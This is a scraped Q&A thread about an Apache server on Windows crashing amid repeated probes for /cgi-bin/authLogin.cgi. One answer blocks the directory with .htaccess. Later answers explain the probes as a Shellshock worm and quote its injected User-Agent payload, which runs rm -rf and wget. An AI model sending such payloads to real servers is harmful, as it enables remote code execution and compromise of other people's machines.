Apache http server has stopped working

Question

Apache http server has stopped working

8.3k views Asked by karuppub At 23 November 2024 at 21:26

Hi Friends,

I am using Ampps server with php 5.3.29 in windows server datacenter.

unfortunately i am getting the following prompt in windows server and my site down.

Prompt title: Microsoft windows

Prompt Message: Apache http server has stopped working.

A problem caused the program to stop working correctly. windows will close the program and notify you if a solution is available.

Trace:

When i tracing error and access logs, i found the following logs as the cause.

In Apache access log:

202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335 81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335

In Apache error log:

[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

Please help me.

Original Q&A

There are 4 answers

**karuppub** · Answer 1 · 2014-12-10 13:51:22

karuppub On 10 December 2014 at 13:51

Finally i denied those client to access the cgi-bin directory.

in cgi-bin directory i created a .htaccess file

I added following line in .htaccess

Deny From all.

**NicholasDTC** · Answer 2 · 2014-12-10 13:12:14

NicholasDTC On 10 December 2014 at 13:12

If you try to open this file, what happens?

D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi

The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".

**Mutified** · Answer 3 · 2014-12-16 03:06:57

There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm so the download server is compromised. Id like a copy of S0.sh if you happen to get one give it to exploit-db or something like it. The clever command is: Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

The file is executed following download. I suppose there's something about HDB_DATA, which I don't even have. "Information is Paramount!"

**mutified** · Answer 4 · 2016-11-14 01:01:59

I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to or successfully removes /tmp/S0.sh and make a directory php in the share folder and then execute wget.

/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget

Here is what came up after all that time of wondering: http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html

"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."

So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.

From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.

TechQA.

Apache http server has stopped working

There are 4 answers

Related Questions in PHP

Related Questions in APACHE

Related Questions in AMPPS

Popular Questions

Popular Tags

Trending Questions